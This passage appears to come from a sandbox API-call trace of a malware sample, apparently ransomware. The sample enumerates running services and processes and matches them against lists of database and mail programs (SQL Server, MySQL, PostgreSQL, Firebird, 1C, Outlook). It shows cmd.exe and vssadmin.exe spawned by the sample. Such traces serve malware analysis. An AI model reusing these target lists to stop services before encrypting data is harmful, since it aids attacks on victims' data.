[0041.768] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0041.768] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0041.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0041.768] lstrlenW (lpString="UxSms") returned 5 [0041.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0041.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0041.768] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0041.768] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0041.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0041.768] lstrlenW (lpString="VSS") returned 3 [0041.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0041.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0041.768] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0041.768] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0041.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0041.768] lstrlenW (lpString="WdiServiceHost") returned 14 [0041.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.768] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0041.768] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0041.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0041.769] lstrlenW (lpString="WdiSystemHost") returned 13 [0041.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.769] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0041.769] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0041.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0041.769] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0041.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.769] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0041.769] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0041.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0041.769] lstrlenW (lpString="Winmgmt") returned 7 [0041.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0041.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0041.769] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0041.769] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0041.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0041.769] lstrlenW (lpString="WPDBusEnum") returned 10 [0041.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.769] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0041.769] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0041.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0041.770] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x396ed68 | out: hHeap=0x570000) returned 1 [0041.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ec [0041.772] Process32FirstW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0041.773] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0041.773] lstrlenW (lpString="System") returned 6 [0041.773] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0041.773] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0041.773] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0041.773] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0041.773] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0041.773] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0041.774] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0041.774] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0041.774] lstrlenW (lpString="smss.exe") returned 8 [0041.774] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0041.774] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0041.774] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0041.774] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0041.774] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0041.774] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0041.774] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0041.774] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.775] lstrlenW (lpString="csrss.exe") returned 9 [0041.775] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.775] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0041.775] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0041.775] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0041.775] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0041.775] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0041.775] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0041.775] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0041.776] lstrlenW (lpString="wininit.exe") returned 11 [0041.776] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0041.776] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0041.776] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0041.776] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0041.776] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0041.776] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0041.776] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0041.776] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.777] lstrlenW (lpString="csrss.exe") returned 9 [0041.777] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.777] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0041.778] lstrlenW (lpString="winlogon.exe") returned 12 [0041.778] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0041.778] lstrlenW (lpString="services.exe") returned 12 [0041.778] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0041.779] lstrlenW (lpString="lsass.exe") returned 9 [0041.779] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0041.780] lstrlenW (lpString="lsm.exe") returned 7 [0041.780] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.780] lstrlenW (lpString="svchost.exe") returned 11 [0041.780] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.781] lstrlenW (lpString="svchost.exe") returned 11 [0041.781] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.782] lstrlenW (lpString="svchost.exe") returned 11 [0041.782] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.783] lstrlenW (lpString="svchost.exe") returned 11 [0041.783] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.783] lstrlenW (lpString="svchost.exe") returned 11 [0041.783] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0041.784] lstrlenW (lpString="audiodg.exe") returned 11 [0041.784] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.785] lstrlenW (lpString="svchost.exe") returned 11 [0041.785] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.786] lstrlenW (lpString="svchost.exe") returned 11 [0041.786] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0041.786] lstrlenW (lpString="dwm.exe") returned 7 [0041.786] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0041.787] lstrlenW (lpString="explorer.exe") returned 12 [0041.787] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0041.788] lstrlenW (lpString="spoolsv.exe") returned 11 [0041.788] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.788] lstrlenW (lpString="taskhost.exe") returned 12 [0041.788] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.789] lstrlenW (lpString="svchost.exe") returned 11 [0041.789] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0041.790] lstrlenW (lpString="taskeng.exe") returned 11 [0041.790] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.790] lstrlenW (lpString="taskhost.exe") returned 12 [0041.791] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0041.791] lstrlenW (lpString="called.exe") returned 10 [0041.791] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0041.792] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0041.792] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0041.793] lstrlenW (lpString="analyst.exe") returned 11 [0041.793] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0041.793] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0041.793] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0041.794] lstrlenW (lpString="wages.exe") returned 9 [0041.794] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0041.795] lstrlenW (lpString="rand.exe") returned 8 [0041.795] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0041.795] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0041.795] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0041.796] lstrlenW (lpString="cottage.exe") returned 11 [0041.796] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0041.797] lstrlenW (lpString="pairs_spec.exe") returned 14 [0041.797] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0041.798] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0041.798] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0041.798] lstrlenW (lpString="observationshairy.exe") returned 21 [0041.798] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0041.799] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0041.799] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0041.800] lstrlenW (lpString="spectrum.exe") returned 12 [0042.143] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0042.144] lstrlenW (lpString="dies.exe") returned 8 [0042.144] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0042.145] lstrlenW (lpString="configured.exe") returned 14 [0042.145] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0042.145] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0042.145] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0042.146] lstrlenW (lpString="fast.exe") returned 8 [0042.146] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0042.147] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0042.147] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0042.147] lstrlenW (lpString="review.exe") returned 10 [0042.147] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0042.148] lstrlenW (lpString="historybinding.exe") returned 18 [0042.148] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0042.149] lstrlenW (lpString="pk task surge.exe") returned 17 [0042.149] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0042.150] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0042.150] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0042.150] lstrlenW (lpString="mobsync.exe") returned 11 [0042.150] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0042.151] lstrlenW (lpString="ivttvf.exe") returned 10 [0042.151] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0042.152] lstrlenW (lpString="cmd.exe") returned 7 [0042.152] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0042.152] lstrlenW (lpString="conhost.exe") returned 11 [0042.152] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0042.153] lstrlenW (lpString="vssadmin.exe") returned 12 [0042.153] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0042.154] lstrlenW (lpString="VSSVC.exe") returned 9 [0042.154] Process32NextW (in: hSnapshot=0x1ec, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0042.155] CloseHandle (hObject=0x1ec) returned 1 [0042.155] Sleep (dwMilliseconds=0x1f4) [0042.926] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5f0070 [0042.926] EnumServicesStatusExW (in: hSCManager=0x5f0070, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, 